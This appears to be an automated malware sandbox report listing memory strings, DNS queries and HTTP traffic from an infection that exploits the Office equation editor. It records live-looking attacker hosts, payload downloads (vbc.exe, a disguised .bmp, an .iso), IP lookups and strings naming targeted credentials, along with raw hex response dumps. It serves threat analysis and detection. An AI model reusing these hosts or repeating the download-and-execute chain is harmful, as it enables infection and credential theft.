              Source: explorer.exe, 0000000B.00000003.1029049292.00000000028E0000.00000004.00000001.00020000.00000000.sdmp, A173.exe, 0000000F.00000002.1147471044.0000000002131000.00000004.00000800.00020000.00000000.sdmp, A173.exe, 0000000F.00000002.1191563136.00000000062A2000.00000004.00000001.00020000.00000000.sdmp, A173.exe, 0000000F.00000002.1144992878.0000000000615000.00000004.00000020.00020000.00000000.sdmp, A173.exe, 0000000F.00000000.1027602800.00000000001A2000.00000020.00000001.01000000.00000006.sdmp, A173.exe, 0000000F.00000002.1143807077.00000000001A2000.00000020.00000001.01000000.00000006.sdmp, Wlrfmqer.exe, 0000001D.00000002.1194920660.000000000053F000.00000004.00000020.00020000.00000000.sdmp, Wlrfmqer.exe, 0000001D.00000002.1197851065.0000000002131000.00000004.00000800.00020000.00000000.sdmp, Wlrfmqer.exe.15.drString found in binary or memory: http://www.hzncars.com.my/wp-content/Mzyroxbxfa.bmp
              Source: explorer.exe, 0000000B.00000000.958830013.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
              Source: explorer.exe, 0000000B.00000000.973561613.00000000046D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
              Source: explorer.exe, 0000000B.00000000.970463322.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
              Source: explorer.exe, 0000000B.00000000.950805460.00000000084C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.979389772.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.979022134.0000000008575000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.942146947.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.965131987.0000000008575000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.969735635.0000000002CBF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
              Source: explorer.exe, 0000000B.00000000.951546335.0000000008617000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.979166733.0000000008617000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleaner1SPS0
              Source: explorer.exe, 0000000B.00000000.979564716.0000000008807000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.951894615.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.979389772.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.979022134.0000000008575000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.965131987.0000000008575000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
              Source: explorer.exe, 0000000B.00000000.958096770.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.942146947.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.969735635.0000000002CBF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerq
              Source: explorer.exe, 0000000B.00000000.945581484.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.972666656.0000000004385000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerv
              Source: explorer.exe, 0000000B.00000000.970463322.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.windows.com/pctv.
              Source: A173.exe, 0000001B.00000002.1197390155.00000000021E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://XMMGADR0NpyOu3G8.org
              Source: A173.exe, 0000001B.00000002.1197973871.0000000002245000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://XMMGADR0NpyOu3G8.orgxV
              Source: explorer.exe, 00000010.00000003.1044637565.0000000000B1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: A173.exe, 0000001B.00000002.1196460854.0000000002167000.00000004.00000800.00020000.00000000.sdmp, A173.exe, 0000001B.00000002.1197240370.00000000021D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
              Source: A173.exe, 0000001B.00000002.1197240370.00000000021D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
              Source: A173.exe, 0000001B.00000002.1197240370.00000000021D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.orgP
              Source: A173.exe, 0000001B.00000002.1196460854.0000000002167000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.orgappdatanEdENIrnEdENIr.exefacebooktwittergmailinstagrammovieskypepornhackwhatsap
              Source: explorer.exe, 00000010.00000003.1044637565.0000000000B1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: explorer.exe, 00000010.00000003.1044637565.0000000000B1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: explorer.exe, 00000010.00000003.1044637565.0000000000B1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: explorer.exe, 00000010.00000003.1044637565.0000000000B1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: explorer.exe, 00000010.00000003.1044637565.0000000000B1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
              Source: explorer.exe, 00000010.00000003.1044637565.0000000000B1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: A173.exe, 0000001B.00000002.1200913280.0000000006584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
              Source: explorer.exe, 0000000B.00000000.939356183.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.1034020349.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.955023647.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.966991833.0000000000335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
              Source: explorer.exe, 00000010.00000003.1044637565.0000000000B1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/favicon.ico
              Source: explorer.exe, 0000000B.00000000.939356183.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.1034020349.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.955023647.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.966991833.0000000000335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
              Source: explorer.exe, 0000000B.00000000.939356183.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.1034020349.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.955023647.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.966991833.0000000000335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
              Source: A173.exe, 0000000F.00000003.1138008706.0000000003DF6000.00000004.00000800.00020000.00000000.sdmp, A173.exe, 0000000F.00000003.1132267573.0000000003817000.00000004.00000800.00020000.00000000.sdmp, A173.exe, 0000000F.00000002.1188288780.0000000006070000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/jsonschema
              Source: A173.exe, 0000000F.00000003.1138008706.0000000003DF6000.00000004.00000800.00020000.00000000.sdmp, A173.exe, 0000000F.00000003.1132267573.0000000003817000.00000004.00000800.00020000.00000000.sdmp, A173.exe, 0000000F.00000002.1188288780.0000000006070000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
              Source: A173.exe, 0000001B.00000002.1196460854.0000000002167000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{D52DD7C1-E0C4-4A5F-B905-430AAA97020F}.tmpJump to behavior
              Source: unknownDNS traffic detected: queries for: esplogem.ga
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 5_2_0376055E LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess,5_2_0376055E
              Source: global trafficHTTP traffic detected: GET /contract/2022-11-14_02-53.iso HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: ndtcconsultant.com
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Host: api.ipify.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /000000_0000000_000000_000000_0000000_000000_000000/0000_000000_00000.doc HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 192.227.132.49Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /179/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.227.132.49Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /wp-content/Mzyroxbxfa.bmp HTTP/1.1Host: www.hzncars.com.myConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /wp-content/Mzyroxbxfa.bmp HTTP/1.1Host: www.hzncars.com.myConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /wp-content/Mzyroxbxfa.bmp HTTP/1.1Host: www.hzncars.com.myConnection: Keep-Alive
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49177
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49174
              Source: unknownNetwork traffic detected: HTTP traffic on port 49174 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49177 -> 443
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 22 Nov 2022 04:09:04 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Founddate: Tue, 22 Nov 2022 04:09:03 GMTserver: Apache/2.4.6 (CentOS) PHP/5.6.40x-powered-by: PHP/5.6.40transfer-encoding: chunkedcontent-type: text/html; charset=utf-8Data Raw: 33 36 31 46 0d 0a 83 00 00 00 43 d9 e9 67 f9 8a bc 50 ea 4c 51 91 d6 29 e0 35 74 13 23 63 3f 01 a6 a1 ef e5 c6 96 63 a4 a7 9c 1a de 8a 41 78 5f 5b d9 71 8f 1d ba 31 d0 ef ea dd ce 35 06 0c 77 d1 08 a6 c2 1b ed 94 1c 33 4d 6b 6d 8f 2e 10 28 ba 06 37 84 5e 1d 6d 30 f2 c6 23 87 82 1e ad 36 a0 c3 a8 da 56 ee 16 a7 00 76 17 ad 8b 47 f9 53 1f 44 3f f7 bf f2 da 5a ad a7 e2 a5 cb 9b 82 f6 11 c4 ab 1f 3c 07 b6 da 2a a7 b2 32 5e 00 a0 b6 04 00 56 72 5d 16 09 02 02 00 07 00 9e 03 00 00 69 75 a3 8a ef df d6 e3 ce bf 7c 65 48 15 1c 00 ed 7b e5 fe df 7c 37 06 83 f0 c1 4d 79 11 ee 0a 9a cf 6d eb 88 18 29 3f 11 53 fe 9b b6 21 2e a0 1d 3b f2 18 9a e2 ef 0c a6 12 63 36 c6 50 8f 8f 5d 2d 68 4f 5c ba 9a cb b7 8a 9f 4a 2a 5a fd ae 50 23 35 e0 c9 c2 09 a8 61 cf 70 ad a0 66 05 1f 41 7b b6 69 22 63 ee 76 7d fc 19 60 22 87 ac 19 2f 4f d5 64 4f 16 b5 35 c8 b9 71 d2 02 15 2e ad 59 13 c1 59 2d a0 c0 b2 9f 7c 02 cd cc 22 4a ad b6 06 a2 23 0d 79 09 68 09 9d dc 98 2c 74 8e ff 3f d8 3f 4f 61 1a 13 ff 37 9b 81 27 b9 71 21 5c 9a e8 c2 0b 99 a8 f7 27 83 d4 8f fa e2 a7 5d c4 72 1d 02 44 42 0f 3a fd 16 71 59 66 7a 37 99 1b 01 04 45 8b 58 13 d4 47 ff cb 32 ce 92 a7 18 5f 66 18 44 10 92 c3 34 5d c9 29 32 7e 64 26 bb c8 e4 ed e0 21 d2 80 23 be 08 c2 82 97 f3 b9 a1 77 01 d4 1d fd 70 d2 9e eb b6 52 3b 7a 14 2a af e5 39 a1 81 9c 68 74 21 4c 16 5b 0b 10 fb 9c d5 d1 bb d2 24 a9 4b 94 14 36 3f 7e 35 c5 7f 70 6b 11 51 da 50 91 41 5b 6e 41 d7 66 27 9a 73 30 8a 76 38 20 18 d9 35 1e e0 29 05 b5 ba 7c e8 41 d1 b6 84 9e d5 34 65 94 89 9b 1b 5f 67 c3 5e f3 a0 a2 5e 4e 6c 52 be e4 9d da f4 81 cd 45 1b 92 8e 85 5e 0d 25 29 e9 14 83 d3 78 d6 92 8e c7 e3 74 e7 b6 df 94 d6 18 11 4e 49 91 45 e9 58 68 d3 c8 89 8c 04 84 64 59 e6 6f 79 e1 fc c7 a3 39 e0 41 77 e8 c9 f6 4a 13 34 7e e3 2b 47 ab 42 54 a5 02 c3 1b 6e 57 a1 e8 c3 4b e5 74 42 e7 e9 5b af 94 e7 1b f2 c8 e5 96 4f 9c 72 e4 b9 75 20 fa 2a be 90 7c 1e bf 1e 3b 45 2b c7 44 21 af 8b 1c 90 71 04 1a 82 3e ed 90 36 2d 0f 50 68 08 cb 59 3d e9 a7 cb 09 37 e4 5e 71 27 a9 68 44 61 b7 33 4b 57 4c 39 e0 31 62 8b fd 1e 3d 6a 34 f8 e0 87 b9 61 10 38 e8 5a 79 0e 7f 2a e5 23 39 02 c6 58 b1 30 67 88 d7 65 ab eb e2 34 f2 52 aa 10 c2 36 e5 fc 72 2b 47 57 ff 28 f9 4c d2 f4 bf fd cd 8a c2 37 32 5c 3e da d3 aa bb b3 53 9b 59 c2 8e b3 bf f8 64 7f ab 0e 90 25 57 96 29 5b b9 a4 da db 50 6d 4c 8c 74 71 25 a2 f7 6c 30 5f 89 3a 06 6d 0b f1 f9 bb 6b 89 47 13 79 b1 1f 29 5d 1a c3 15 87 0b 91 6a 4a 68 00 3d 83 21 06 ee 82 29 58 dd fb 9f d0 d2 15 9d b7 f0 92 18 e5 8e fa 4c 86 15 75 de 5a ef 95 b6 cd 30 6f 33 ac af 2d 5b 93 10 f4 ab 4d ca c5 6c f3 c9 c7 13 1f f0 dd ef 1c 84 4f c1 34 2d a1 6f e4 49 00 68 90 6c 2a 5a 9c 41 92 e5 56 94 1e 24 ef 0f 2e ff c0 91 74 86 fb 21 61 1c 39 f3 24 c9 aa 0e c8 72 46 1a a7 01 6e 5b e6 28 e7 73 a7 b0 26 b9 b0 4c 37 cd 1c 28 e5 41 d3 7a 66 a4 dd fd
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Founddate: Tue, 22 Nov 2022 04:09:04 GMTserver: Apache/2.4.6 (CentOS) PHP/5.6.40x-powered-by: PHP/5.6.40content-length: 68content-type: text/html; charset=utf-8Data Raw: 00 00 e9 b1 b9 7a b7 9f b8 5b a9 00 56 82 fd 2b e6 63 3e 4f 70 2d 2e 0e a0 ad f5 e4 c6 97 3d e9 e3 9f 55 d1 89 49 23 16 18 9d 69 92 1b b0 2b d5 f1 f0 9f 9d 6b 44 4a 35 92 58 d3 de 03 b0 c0 5c 6e 0e 34 28 Data Ascii: z[V+c>Op-.=UI#i+kDJ5X\n4(
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Founddate: Tue, 22 Nov 2022 04:09:06 GMTserver: Apache/2.4.6 (CentOS) PHP/5.6.40x-powered-by: PHP/5.6.40transfer-encoding: chunkedcontent-type: text/html; charset=utf-8Data Raw: 32 38 37 36 0d 0a 00 00 f5 95 d9 1f d7 f6 d1 35 9b 20 3e f6 a8 5b 48 a5 84 57 78 48 5a 6d e3 c7 9b 97 a0 fb 41 8a d6 a8 14 dc 92 41 62 01 28 a7 64 90 1f a0 02 d4 bb ad c1 8f e4 71 79 30 03 6c 8e ee 31 9d f5 6f 40 67 47 47 fc 47 77 46 90 2a 1d f7 37 7a 03 1d 9b a8 09 ab a8 6d c4 51 ce aa c6 f0 7a c4 74 c6 6e 1d 3d 81 a1 34 90 34 71 64 56 99 95 8e e0 26 d1 9d 9e d5 a7 ee e5 9f 7f 9b d8 76 46 62 8b e9 1a 9f 8a 0b 68 b6 3c 4d 0a 9c 0f 5c b6 6f ad 41 92 6e f8 00 b1 df 4c b1 a8 0e 42 e5 ce 81 9f 3c 0e 84 71 ae a1 e3 cc 11 b4 8c e1 28 e1 6e 2f 0c bf 34 cc ed ac a3 8b f8 3f 04 6a c7 34 f0 96 ed d8 be fc 25 e6 b9 b0 39 55 71 f5 7f a1 71 8f fb c0 b3 21 e9 fa d6 68 70 34 54 51 a2 e1 2b c9 df fb 83 3a 75 ed 56 44 0b 1e 43 1b 8b fe 93 eb 67 41 31 04 a6 88 dc f3 03 d0 0b ed ba 3b 2a 3f d8 ab 56 d6 9b 3e 65 20 50 96 00 0d 88 59 f7 ca 8b 4e f2 f0 f2 66 a9 a8 ec 31 ca 11 0e 08 37 8d b3 57 52 f8 79 01 66 25 cd 00 81 fb 41 7a 84 ab 5f 43 d5 d2 38 cb 8f 27 eb af 18 02 75 24 27 b0 df 7e 11 88 92 37 a7 de fb d2 ea 13 b6 94 51 30 c3 59 1f a8 59 05 7e 35 c5 af 01 be 57 26 cc 9d de 56 88 3e f1 64 a4 4d d0 6b ec a7 48 91 75 96 34 0c cd ba 14 22 be 00 11 f4 4f d1 87 d3 f2 08 ce f1 33 37 4e 09 58 4a 1f 0a 34 25 2c c9 05 67 a8 52 f2 72 fb 0f cb ee be 91 1d 8e b5 02 cb f7 80 ee 87 80 eb f4 5f db aa af d3 54 6b e4 4d 6c 7b 70 f2 75 56 a0 c0 e2 6e e6 8b 82 00 28 4f b2 68 46 7d ee db eb ce 3e f9 60 e5 43 ff a7 ff 5e 2a d3 f3 d9 60 7b 51 6c 77 2d 38 17 86 9f f9 a5 88 19 f6 c4 31 2c 97 e9 89 cb 72 5d e4 48 48 5b d0 44 33 d7 47 8a 65 71 a7 c3 0b e5 83 85 ea df ec 27 cf 4d 5c 40 f8 e5 28 76 66 67 20 f8 4c 0b 9f eb b1 6a ec 04 c1 47 a5 86 c2 10 87 95 16 bd 8b 73 af 68 ac 0e de 1c 87 2e 16 8a f9 8d f0 d8 17 af 7f 19 ee f8 6c 85 8c 4c 10 9b cf ad bd 8b 39 c5 f8 8c 3a 12 3b e2 00 99 3e 2a 7f 22 1a 3c 66 b2 ae ef 15 fc 62 60 eb c3 59 f6 b8 03 cd 88 5f 4c 1c e5 ff 87 a9 39 fc 9f da e2 9a fc e8 8c b6 5e de 95 30 db f4 e1 ee 3e 30 23 6c a7 f8 f9 ac 11 d8 cb 1e 56 f1 bc 71 fb 3e c2 39 48 c9 23 db 18 b8 2a 92 31 23 87 61 d0 b8 3e 0e d3 52 af 2c 2d 21 f2 33 92 b7 82 a4 b3 82 9b df e1 5a 1e 03 e0 e9 36 92 e0 53 a7 10 d7 b3 b5 1f 2d 7e 8d 4b 51 3f d7 4a f4 f7 e5 bd 4f eb ed 7a 44 fe b7 4a 1d 77 3d 7d 63 1a c6 f1 60 21 76 1f c1 ae 07 66 f5 e2 ed 78 81 c7 22 e3 d5 e2 c3 2f 22 ee 60 92 e3 ff db 38 ae c5 1b 86 1a 64 06 d0 9b 6a 59 6a 98 3b 18 46 32 43 3b 11 d8 bc 88 5b d4 29 07 26 81 28 68 f5 be fd 46 9c af b3 15 34 c7 a2 c9 2f 00 7b d9 e3 38 eb 59 b0 90 a6 50 97 b5 29 bf e1 76 de cf ab e5 c7 b9 d3 86 a6 70 e3 01 56 f6 8f 95 c2 62 ae bc 1e 52 a5 20 5b e1 38 af 25 98 b6 33 c7 66 5e e4 42 e7 91 d9 5e e4 e3 39 5b ee 03 9a eb 5e 13 de 0f a9 16 f0 f0 16 4e 7a cb d8 1f 37 a1 a5 1c 54 fb cc c7 30 19 7b ca cc 30 2d 53 c8 ac 0b a8 77 b6 72 a3 3d d2 de f5 06 02 c4 46 8f 72 bd 09 0b 7d 58 06 89 91 cf 31 20
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Founddate: Tue, 22 Nov 2022 04:09:06 GMTserver: Apache/2.4.6 (CentOS) PHP/5.6.40x-powered-by: PHP/5.6.40transfer-encoding: chunkedcontent-type: text/html; charset=utf-8Data Raw: 31 41 39 46 0d 0a 00 00 e8 84 4a 1b c0 f6 d7 35 97 20 3e f6 76 a4 95 59 a9 60 1e 49 5a 6d c3 c2 db 97 b3 fb 49 88 8d eb 7b b2 e6 24 0c 75 77 f3 1d e0 7a d3 5f fa c3 c0 ad af 46 75 7b 18 a3 6c 8c ee 31 9d 75 6f 40 67 49 58 46 49 77 f2 99 e7 3c 4f 36 36 ce 3c cf c0 60 d8 88 1d b6 3e a9 d8 a7 9d 5a a7 15 a8 00 72 49 a1 c3 51 b0 46 04 0a 76 f0 fb ae a4 69 82 bd f3 ba c3 8b cb 92 72 91 fc 76 46 62 8b e9 1a 9f da 4e 68 b6 70 4c 09 9c c7 7a ca 0c ad 41 92 6e f8 00 b1 df ac b1 aa 0f 49 e4 c6 81 9f 2e 0e 84 71 7e a0 e3 cc 11 b4 8c b7 18 e1 6e 2f 2c bf 34 cc ad ac a3 8b f8 7f 04 6a e7 34 f0 96 ef d8 be f8 25 e6 b9 b0 39 55 71 f3 7f a1 71 8f fb c0 b3 21 a9 f8 d6 68 72 34 54 51 a2 e1 2b cb df 9b 06 3a 75 fd 56 44 1b 1e 43 1b 8b ee 93 eb 77 41 31 04 a6 88 dc e3 03 d0 0b ed ba 3b 2a 3f d8 ab 56 da ab 3e 65 6a 50 96 00 0d c8 59 f7 45 46 4f f2 f0 f2 66 a9 a8 ec 31 ca 11 0e 08 37 8d b3 57 52 f8 59 03 66 29 cd 00 81 fb 41 7a 84 ab 5f 43 d5 d2 38 cb 8f 27 eb af 18 02 75 24 27 b0 df 7e 11 88 92 37 a7 de fb d2 ea 13 b6 94 51 30 c3 59 1f a8 59 05 7e 35 c5 af 01 be 77 26 cc 95 de 56 88 3e f1 64 a4 4d d0 6b ec af 68 91 75 de 34 0c cd ba 14 22 be 00 11 f4 4f ff f3 b6 8a 7c ce f1 33 6b 5e 09 58 4a 3f 0a 34 25 3e c9 05 67 aa 52 f2 72 fb 0f cb ee be 91 1d 8e b5 02 cb d7 80 ee e7 ae 99 87 2d b8 aa af d3 db a6 e5 4d 6c 3b 70 f2 75 98 a1 c0 e2 7a e6 8b 82 00 28 4f b2 68 46 7d ee db eb ce 7e f9 60 a5 6d 8d c2 93 31 49 d3 f3 d5 60 7b 51 6c 57 2f 38 17 84 9f f9 a5 6a 18 f6 c4 31 2c 97 e9 89 cb 72 5d e4 48 48 1b d0 44 71 d7 47 8a 65 71 a7 c3 0b e5 83 85 ea df ec 27 cf 71 6c 40 f8 e5 28 76 66 2f 20 f8 4c 09 9f ee b1 72 cf 04 c1 b3 a9 86 c2 13 87 95 16 b7 8b 73 a9 68 ac 0e de 1c 87 2e 16 8a f9 8d f0 d8 17 af 7f 19 ee f8 6c 85 8c 4c 10 9b 7b f9 76 e5 fb f5 e8 30 6d f8 04 a6 be cf b7 8b f8 88 b0 34 7a 48 96 47 5f 71 6d 00 07 c4 2b 1d f1 dd 2f 72 a4 28 34 d7 81 86 c3 18 6b 8c f3 bb 05 1b 0f 4a 70 f6 fc 20 bb b7 fd da ac 3f 52 e7 43 dd de d1 65 ac 0a d3 63 ee 55 7e 48 da f1 70 cd a1 eb 68 65 b0 d9 28 a1 80 f2 7d b0 54 a0 f5 0a 9b 41 f1 79 79 93 99 23 9f 57 be 1d a1 dc 8a d4 fe 9a 4b 8c 3a 33 3c 36 31 40 b7 51 1f fc 97 2c 50 a5 00 96 20 d6 cb c8 37 fa a5 8c f7 e1 fc 22 08 fe 9c 00 d1 74 6b 94 62 ab 8d de 80 7d d4 34 ad 2b d5 c4 a4 45 39 76 ce ed 6b f4 28 49 f2 f0 13 f0 b9 42 69 87 a3 32 50 26 d0 ee ef 6c 50 8d a2 2e e1 f5 e2 18 73 ff 4e d1 9d 94 16 c0 2e 10 f9 b0 91 98 39 da 10 bf 16 14 f3 87 49 39 70 d7 99 d3 30 f3 74 65 5f 20 a1 67 05 2e cb ff cf 35 9e 9d 67 3a 4a 74 ba 4a 23 87 43 ac 93 fd b9 e1 56 af fa 75 af e6 2c d4 ae b0 33 4c ed 70 b5 2c e7 20 46 12 b1 b1 13 9f d0 5c a3 23 3f cc 24 0c a9 e4 56 6f c8 6b ce 4f 23 d6 0e 42 66 d1 0d af fe 17 7f ab a5 04 fa 2c 44 68 23 90 c4 68 57 36 f4 66 1d 24 5c f0 d8 76 b7 0d dd 3c 18 2e fc 0b c7 84 12 ea de 05 b1 71 15 12 f9 b1 68 86 cd 31 20
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Founddate: Tue, 22 Nov 2022 04:09:08 GMTserver: Apache/2.4.6 (CentOS) PHP/5.6.40x-powered-by: PHP/5.6.40content-length: 327content-type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Founddate: Tue, 22 Nov 2022 04:09:17 GMTserver: Apache/2.4.6 (CentOS) PHP/5.6.40x-powered-by: PHP/5.6.40content-length: 327content-type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 